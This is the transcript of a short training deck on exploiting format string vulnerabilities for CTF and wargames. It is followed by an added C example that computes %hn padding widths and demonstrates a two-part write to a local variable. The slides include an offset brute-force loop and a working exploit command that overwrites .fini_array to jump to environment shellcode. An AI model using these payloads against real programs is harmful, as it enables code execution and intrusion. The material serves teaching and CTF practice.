String format exploitation in 15"

Short course I gave about exploiting format string vulnerabilities. Mostly for wargames/CTF.

Source code can be found at:
* https://github.com/milkmix-/training/tree/master/strfmt

Julien Bachmann

January 22, 2015
Transcript

1. intro | source?
   * Comes from variadic functions (va_arg), e.g. printf
   * Missing format string: when the user can specify the format string

2. intro | man 3 printf
     printf("hex value: %x", 42);
     int i; printf("number of bytes so far%n", &i);
     printf("%2$s %1$s\n", "world", "Hello");

3. read | find our buffer
   * It is on the stack
   * Need to find which "virtual argument" of printf it is: brute force it!
   * Possibly need to add 1-3 padding bytes to align on 4 bytes

4. read | find our buffer
     for offset in `seq 0 20`; do echo "offset=$offset"; ./strfmt "AAAA%$offset\$x"; echo; done | grep 4141 -B1

5. write | specific address
   * Put the address in our buffer
   * Use %n to write instead of %x to read
   * Check the system endianness

6. write | specific address
   * What to overwrite? an interesting variable, GOT, .dtors, .fini_array
   * checksec to validate writable zones

7. write | specific address
   * How to write: endianness again ;)
   * Not possible to write 0xffffdee8 (shellcode address in the environment) in one pass
   * Split it in two: 0xdee8 first, then 0xffff - 0xdee8 more
   * Use %hn to write only a word (16 bits) and not rewrite the first part

8. write | specific address
     EGG=`python -c 'print "\x90"*100+"<shellcode>"'`
     ./strfmt `python -c 'print "B \x68\x96\x04\x08\x6a\x96\x04\x08%57055c%6$hn%8471c%7$hn"'`
   * \x68\x96\x04\x08 : @<.fini_array>
   * \x6a\x96\x04\x08 : @<.fini_array> + 2
   * 57055 : 0xdee8 - 9 (bytes already written before the first padding)
   * 8471 : 0xffff - 0xdee8
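The split write on slides 7 and 8, as an added example that is not part of the deck: the function below computes the two %hn padding widths for any 32-bit value and any number of bytes already printed, then drives printf's own %n machinery against a local slot to show the value really lands there. With the deck's numbers (0xffffdee8, 9 bytes before the first padding) it produces the slide's 57055 and 8471. It goes beyond the slide in one way: when the high half is smaller than the low half it writes the high half first, since the byte counter only ever grows. The names hn_plan, plan_hn_writes and hn_write_demo are made up for this illustration, the pointers are passed as explicit arguments instead of being found on the stack with %6$hn/%7$hn, and the format string is a literal so fortified glibc builds accept the %hn.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the deck. hn_plan, plan_hn_writes and
 * hn_write_demo are names invented for this illustration. */

typedef struct {
    unsigned first_width;   /* padding width before the first %hn  */
    unsigned second_width;  /* padding width before the second %hn */
    int low_first;          /* 1: low 16 bits written first, 0: high half first */
} hn_plan;

/* Compute the two field widths needed to store `value` through two %hn
 * conversions when `prefix` bytes (addresses, alignment padding) have
 * already been printed.  The smaller half is written first because the
 * byte counter only grows; %hn keeps the low 16 bits of the counter, so
 * widths wrap modulo 0x10000 and a width of 0x10000 replaces 0 (a %c
 * conversion emits at least one byte). */
hn_plan plan_hn_writes(uint32_t value, unsigned prefix)
{
    hn_plan p;
    unsigned lo = value & 0xffffu, hi = value >> 16;
    unsigned first, second;

    p.low_first = (lo <= hi);
    first  = p.low_first ? lo : hi;
    second = p.low_first ? hi : lo;

    p.first_width  = (first - prefix) & 0xffffu;
    p.second_width = (second - first) & 0xffffu;
    if (p.first_width == 0)  p.first_width  = 0x10000u;
    if (p.second_width == 0) p.second_width = 0x10000u;
    return p;
}

/* Carry out the plan with printf's own %n machinery against a local
 * 32-bit slot and return what landed there.  Unlike the real attack the
 * two pointers are passed as explicit arguments instead of being fetched
 * from the stack with %6$hn / %7$hn, and the format string is a literal
 * so fortified builds of glibc accept the %hn.  Assumes a little-endian
 * host: the low half sits at the lower address, as on the slides. */
uint32_t hn_write_demo(uint32_t value, unsigned prefix)
{
    static char sink[2 * 0x10000 + 64];          /* prefix + both paddings fit */
    char pre[64];
    union { uint32_t word; short half[2]; } slot;
    hn_plan p = plan_hn_writes(value, prefix);
    short *first_ptr  = &slot.half[p.low_first ? 0 : 1];
    short *second_ptr = &slot.half[p.low_first ? 1 : 0];

    if (prefix >= sizeof pre)
        return 0;
    memset(pre, 'A', prefix);                    /* stands in for the address bytes */
    pre[prefix] = '\0';
    slot.word = 0;

    /* %*c pads to the planned width; %hn stores the low 16 bits of the
     * running byte count through the next pointer argument. */
    snprintf(sink, sizeof sink, "%s%*c%hn%*c%hn",
             pre, (int)p.first_width, ' ', first_ptr,
                  (int)p.second_width, ' ', second_ptr);
    return slot.word;
}

int main(void)
{
    hn_plan p = plan_hn_writes(0xffffdee8u, 9);
    printf("%%%uc%%hn%%%uc%%hn (low half first: %d)\n",
           p.first_width, p.second_width, p.low_first);
    printf("slot after the two writes: 0x%08x\n",
           (unsigned)hn_write_demo(0xffffdee8u, 9));
    return 0;
}
```

The prefix argument is the number of bytes the vulnerable printf has already emitted before the first padding conversion, which is why the deck subtracts 9 from 0xdee8; in a real exploit those bytes are the leading alignment byte(s) plus the two 4-byte addresses, and the %6$/%7$ positions come from the brute-force loop on slide 4.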